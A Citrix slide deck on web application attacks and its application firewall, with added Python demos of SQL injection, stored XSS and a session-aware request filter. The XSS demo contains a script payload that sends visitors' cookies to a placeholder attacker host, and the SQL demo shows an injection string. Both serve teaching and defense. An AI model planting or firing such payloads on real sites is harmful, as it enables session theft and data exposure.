Protecting Web Application Delivery with Citrix Application Firewall
Johnson Mok, Systems Engineer, Citrix Systems, Inc.
Six Keys to Successful App Delivery (Optimizing Web Application Delivery)
- Citrix NetScaler: deliver Web applications
- Citrix Presentation Server: deliver Windows applications
- Citrix EdgeSight: monitor end-user experience
- Citrix WANScaler: accelerate apps to branch users
- Citrix Access Gateway: enable secure application access
- Citrix Desktop Server: deliver desktops
Agenda
- From Hacker to Criminal Attacks
- Vulnerabilities and Attacks
- Effective Defense
- What Your Firewall and IPS Vendor Isn't Telling You
- NetScaler Product Family
Business Impact is Far Greater
Traditional network attacks:
- Most security products are focused here
- Target is viruses, worms, spam, etc.
- Highly visible, annoying, messy
- Cost is lost productivity and clean-up
Web application attacks:
- Attacks with criminal intent
- Target is the data behind the apps: financial data, identity information
- Financial implication is far bigger
Web Application Attack Trends
Web infrastructure provides a vulnerable link to sensitive data:
- Credit card numbers
- Social Security numbers
- Employee data
- Healthcare records
- Transaction history
The web threat is growing:
- 73% of web vulnerabilities ranked easy to exploit
- 90% increase in reported web attacks last year
- 75% of attacks target application vulnerabilities
Government acts on privacy and security:
- Gramm-Leach-Bliley Act
- California SB 1386
- Basel II
- Information Privacy Acts
Web Application Security: Vulnerability Score Card
- Protects 16 of 16 application vulnerability classes
- Protects 10 of 10 OWASP Top Ten (Open Web Application Security Project)
- ALL IIS web vulnerabilities: automatically protected
- ALL web worms (Code Red, Nimda, ...): automatically protected
Vulnerability classes:
1. Buffer Overflow Exploits
2. CGI-BIN Parameter Manipulation
3. Form/Hidden Field Manipulation
4. Forceful Browsing
5. Cookie/Session Poisoning
6. Broken ACLs / Weak Passwords
7. Cross-site Scripting (XSS)
8. Command Injection
9. SQL Injection
10. Error Triggering / Sensitive Information Leaks
11. Insecure Use of Crypto
12. Server Misconfiguration
13. Backdoors & Debug Options
14. Web-site Defacement
15. Well-known Platform Vulnerabilities
16. Unpublished Attacks
What Is An Application Attack?
Malicious request (but syntactically valid HTTP) -> Web servers -> Programming error -> Malicious database request -> Complete customer records returned to the attacker
The Top 3 Web App Attacks
1. Cross-Site Scripting (77% of sites vulnerable): ID theft, phishing, password stealing
2. Command Injection: database theft
3. Web Denial of Service (WebDoS): online extortion
SQL Injection Attacks: Accessing databases via web applications
Example SQL injection request: http://shop/index.asp?category=books' or 1=1
SQL Injection Attack: sending SQL fragments to a web application that splices them into a database query, so that the attacker's text executes as SQL and lets the attacker read or change customer and other sensitive information.
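The attack on this slide, as an added Python example that is not part of the original deck: a lookup that splices the category parameter into SQL text the way index.asp is described as doing, beside the parameter-bound version. The catalogue rows are constructed for the demo. The payload adds a trailing `--` to the slide's `books' or 1=1` so that the closing quote the application appends is commented out; without it most engines reject the query as malformed.

```python
import sqlite3

# Constructed catalogue for the demo (not data from the page).
ROWS = [
    (1, "books", "Web Security Handbook"),
    (2, "books", "SQL in Practice"),
    (3, "toys", "Rubber Duck"),
]

# The slide's payload with a SQL line comment appended so the query still parses.
PAYLOAD = "books' or 1=1 --"


def make_db():
    """In-memory products table standing in for the shop database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, category TEXT, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, category):
    """The pattern the slide describes: ?category=... pasted into the SQL text.

    A quote in the input ends the string literal; everything after it is
    parsed as SQL, so `books' or 1=1 --` turns the WHERE clause into
    `category = 'books' or 1=1` and every row comes back.
    """
    sql = "SELECT name FROM products WHERE category = '%s'" % category
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, category):
    """Bound parameter: the value reaches the engine as data and is never parsed as SQL."""
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    db = make_db()
    print("honest:    ", vulnerable_lookup(db, "books"))
    print("injected:  ", vulnerable_lookup(db, PAYLOAD))   # all three rows
    print("bound:     ", safe_lookup(db, PAYLOAD))         # no such category
```

The bound version returns nothing for the payload because the database looks for a category literally named `books' or 1=1 --`; an application firewall in front of the vulnerable version would have to block the request on the quote and SQL keywords in a parameter that was served as a plain category name.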
Cross-Site Scripting Attacks: Attacking trust relationships
1. Hacker posts <malicious script> to a vulnerable web application
2. Innocent user downloads the script and executes it
3. Script captures credential information and sends it to the hacker
Cross-Site Scripting (XSS) Attack: inserting a malicious script that enables identity theft by the attacker, compromising the trust relationship between a user and a web application.
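The stored-XSS flow on this slide, as an added Python example that is not part of the original deck: a comment renderer that pastes user input straight into HTML (so step 1 succeeds and every later viewer executes the script in step 2), beside the hardened version that HTML-encodes the input so it stays text. The payload and the `attacker.invalid` hostname are constructed for the demo.

```python
import html

# Constructed step-1 payload: a comment body that ships the viewer's cookies
# to the attacker (step 3). The hostname is a reserved placeholder, not a real site.
XSS_PAYLOAD = (
    '<script>new Image().src="http://attacker.invalid/?c="'
    "+encodeURIComponent(document.cookie)</script>"
)


def render_comment_unsafe(author, body):
    """Vulnerable: user text is emitted as markup, so the browser runs any <script> in it."""
    return "<p><b>%s</b>: %s</p>" % (author, body)


def render_comment_safe(author, body):
    """Hardened: encode &, <, >, \" and ' so the browser renders the text literally."""
    return "<p><b>%s</b>: %s</p>" % (
        html.escape(author, quote=True),
        html.escape(body, quote=True),
    )


def executes_script(rendered):
    """Crude check for the demo: does an actual <script> tag survive in the output?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_unsafe("eve", XSS_PAYLOAD))   # script tag intact: runs in every viewer
    print(render_comment_safe("eve", XSS_PAYLOAD))     # &lt;script&gt;...: displayed, not run
```

Output encoding is the application-side fix; the firewall-side defense on the later slides is to reject the request at step 1, because a comment field that was served as free text should not come back containing markup.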
Forceful Browsing: Brute-force penetration of the infrastructure
Blogger Wild Bill Kerr investigating the Foley scandal:
"ABC thought it had deleted from the site the AOL screen name of a page who received messages from the congressman. By altering the [web page] address, the blogger gained access to the name which still existed on an older version of the [site]." (Wall Street Journal, Oct 16, 2006)
Forceful Browsing Attack: manipulating request URLs to gain access to content you are not entitled to see.
Defense Strategies
- Do nothing and hope for the best
- Pre-emptive patching against known vulnerabilities
- Reactive patching against unknown/new vulnerabilities
- Server-based protections
- Appliance-based protections
Citrix NetScaler 8.0: Citrix Application Firewall
Effective defense against application-layer attacks:
- Hardened security appliance
- High-performance security for Web and Web Services
- Positive security model, no signatures
- Advanced application learning
- Simple browser-based policy management
- Advanced DDoS protection
Positive Security Offers Zero-Day Defense
- Only legal (safe) client requests are forwarded to the application
- Client requests violating best practices and the HTTP RFCs are blocked
Benefits of positive security:
- No attack signature databases to maintain
- Protects the application and the application logic
- Real-time protection for known and unknown attacks
Defense Demands Full Request Inspection: Looking deeper into every request
- RFC-compliant content can still be dangerous: a request can be valid HTTP and still carry an attack
- More intelligence about the request yields more defense
Benefits of comprehensive request inspection:
- Buffer overflow protection
- Cross-site scripting (XSS) protection
- SQL injection protection
- URL mapping eases administration of complex sites
Defense Demands Session Awareness and Bi-directional Inspection
- Served content is memorized on a per-session basis
- Client requests not matching the served content are blocked
Benefits of session awareness:
- Form-field protection
- Forceful browsing protection
- Cookie poisoning protection
Defend Against Encrypted Attacks! Cannot defend against what cannot be seen
- Encryption terminated at the firewall
- Optional re-encryption back to the servers
Benefits of SSL decryption and encryption:
- Full defense against encrypted attacks
- Increased web infrastructure performance with SSL offload
Complex Web Applications Require Learning: Enhancing the positive security model to prevent false positives
- The positive security model and sessionization ensure that what is served must be returned unmodified
- Modern web applications serve JavaScript that intentionally modifies cookies, fields, etc., which a strict model would flag as tampering
- Application learning tunes the positive security model, eliminating false positives by learning which changes are permitted
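A working sketch of the positive-security, session-aware model described across the slides on zero-day defense, full request inspection, session awareness and learning, and of the forceful-browsing case from the earlier slide. This is an added Python example written for this page, not NetScaler's implementation: the `SessionAwareFilter` class, its `relaxations` allow-list, the `SERVED_PAGE` HTML and the session id are all assumed. The filter memorizes per session what the server served (links, form actions, hidden-field values, cookies) and allows only requests consistent with that; the learned relaxations are the (URL, field) pairs page JavaScript is allowed to change.

```python
import re


class SessionAwareFilter:
    """Toy positive-security, session-aware request filter (assumed design).

    Nothing is matched against attack signatures: a request is allowed only if it
    targets an entry point or a URL this session was served, returns hidden fields
    and cookies unchanged (unless learning relaxed that field), and keeps every
    value under a size limit.
    """

    def __init__(self, start_urls, relaxations=(), max_value_len=256):
        self.start_urls = set(start_urls)     # entry points a fresh session may request
        self.relaxations = set(relaxations)   # learned (url, field) pairs JavaScript may change
        self.max_value_len = max_value_len    # crude buffer-overflow guard
        self.sessions = {}

    def _session(self, sid):
        return self.sessions.setdefault(sid, {"urls": set(), "forms": {}, "cookies": {}})

    def observe_response(self, sid, page):
        """Memorize links and hidden fields from a served page (toy regex parser;
        assumes the attribute order used in SERVED_PAGE below)."""
        s = self._session(sid)
        s["urls"].update(re.findall(r'href="([^"]+)"', page))
        for action, body in re.findall(r'<form[^>]*action="([^"]+)"[^>]*>(.*?)</form>', page, re.S):
            s["urls"].add(action)
            hidden = re.findall(r'<input[^>]*type="hidden"[^>]*name="([^"]+)"[^>]*value="([^"]*)"', body)
            s["forms"][action] = dict(hidden)

    def observe_cookie(self, sid, name, value):
        """Memorize a cookie the server set; later requests must echo it unchanged."""
        self._session(sid)["cookies"][name] = value

    def check_request(self, sid, url, form=None, cookies=None):
        """Return (allowed, reason) for a client request in session `sid`."""
        s = self._session(sid)
        form, cookies = form or {}, cookies or {}
        # Forceful browsing: only entry points or URLs this session was actually served.
        if url not in self.start_urls and url not in s["urls"]:
            return False, "forceful browsing: %s was never served to this session" % url
        # Full request inspection: reject oversized values before the application sees them.
        for name, value in form.items():
            if len(value) > self.max_value_len:
                return False, "oversized field: %s" % name
        # Form-field protection: hidden fields come back as served, unless learning relaxed them.
        for name, served in s["forms"].get(url, {}).items():
            if form.get(name) != served and (url, name) not in self.relaxations:
                return False, "hidden field %s was modified" % name
        # Cookie poisoning: cookies come back as set.
        for name, served in s["cookies"].items():
            if cookies.get(name) != served:
                return False, "cookie %s was modified" % name
        return True, "ok"


# Constructed page the application served to session "s1" (not from the deck).
SERVED_PAGE = """
<a href="/account">My account</a>
<form action="/checkout" method="post">
  <input type="hidden" name="price" value="100">
  <input type="hidden" name="tz" value="">
  <input type="text" name="qty">
</form>
"""


def demo():
    """Walk one session through the checks; returns a name -> allowed mapping."""
    sid = "s1"
    honest = {"price": "100", "tz": "UTC", "qty": "2"}   # tz is filled in by page JavaScript
    waf = SessionAwareFilter(start_urls={"/"}, relaxations={("/checkout", "tz")})
    r = {}
    r["start_page"] = waf.check_request(sid, "/")[0]
    r["unserved_link"] = waf.check_request(sid, "/account")[0]      # nothing served yet
    waf.observe_response(sid, SERVED_PAGE)
    r["served_link"] = waf.check_request(sid, "/account")[0]
    r["forceful_browse"] = waf.check_request(sid, "/admin/users")[0]
    r["honest_form"] = waf.check_request(sid, "/checkout", honest)[0]
    r["tampered_price"] = waf.check_request(sid, "/checkout", dict(honest, price="1"))[0]
    r["oversized_field"] = waf.check_request(sid, "/checkout", dict(honest, qty="A" * 300))[0]
    waf.observe_cookie(sid, "role", "user")
    r["cookie_ok"] = waf.check_request(sid, "/account", cookies={"role": "user"})[0]
    r["cookie_poisoned"] = waf.check_request(sid, "/account", cookies={"role": "admin"})[0]
    # Without the learned relaxation the same honest form is a false positive.
    strict = SessionAwareFilter(start_urls={"/"})
    strict.observe_response(sid, SERVED_PAGE)
    r["honest_form_unlearned"] = strict.check_request(sid, "/checkout", honest)[0]
    return r


if __name__ == "__main__":
    for name, allowed in demo().items():
        print("%-22s %s" % (name, "allowed" if allowed else "BLOCKED"))
```

The `honest_form_unlearned` case is the false positive the slide warns about: the page's own JavaScript changed `tz`, and a model that only knows "what is served must be returned unmodified" blocks it until learning adds the `("/checkout", "tz")` relaxation. The filter needs to see the response as well as the request (bi-directional inspection), which in practice also means terminating TLS in front of it.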
Traditional Network Security
- Traditional network security is focused on stopping automated attacks such as worms and viruses at the network perimeter
- The goal of these attacks is to disrupt by exploiting known vulnerabilities in known systems
- Traditional security products stop these attacks by creating new signatures each time a new hole is discovered
Diagram: worms, viruses and network attacks hit network firewalls, IPS and anti-virus in front of the web servers, application servers / packaged apps and database servers (each with its own OS).
The Web Application Threat
- Most targeted hacker activity today, however, focuses on customized web apps, which are extremely hard to write securely
- Traditional methods do little to stop these attacks, since you cannot write patches or signatures for customized code
- These threats are far more dangerous because they give largely untraceable access to data (financial, identity, credit cards, etc.)
- 75% of targeted attacks now target web applications
Diagram: network firewalls, IPS and anti-virus still stop worms, viruses and network attacks, but customized web applications (customized packaged apps, internally developed web applications) have NO SIGNATURES and NO PATCHES, so targeted attacks pass through the web servers, app servers and database servers to the DATA.
Web Application Firewalls
- Web application firewalls protect data by blocking known and unknown attacks in underlying platforms and customized code
Diagram: web application firewalls sit alongside network firewalls, IPS and anti-virus and block targeted attacks on sensitive data before they reach the customized web applications, web servers, app servers, database servers and DATA.
Network Firewalls vs. Application Firewalls: Open for business = open to attack
Network firewalls:
- Protect at Layer 3/4 (IP addresses and TCP/UDP ports)
- Forward approved packets
- Specifically configured to be open on TCP ports 80/443 (HTTP/HTTPS), so any web attack passes through
- No awareness of HTTP/S sessions
Application firewalls:
- Protect at Layer 7
- Block attacks rather than just forwarding packets
- Bi-directional inspection
- Fully session-aware
- Protect web application logic and infrastructure from malicious attacks and erroneous disclosures
IPS / IDS vs. Application Firewalls: Negative security = vulnerable on day zero
Intrusion Detection and Intrusion Prevention Systems (IDS / IPS):
- Negative security model based on signatures
- Vulnerable to zero-day attacks
- No awareness of HTTP/S sessions
- Typically no SSL decryption
- Cannot discover attacks in SSL sessions
Application firewalls:
- Positive security model enforces correct behavior
- Every-day attack prevention
- Aware of URLs, cookies and form fields in sessions
- Full SSL decryption
- Can see all attacks
- Full proxy architecture
Customers by sector: Financial Services, Insurance, Healthcare, eGovernment, eCommerce (customer logos shown include AIG and Guardian)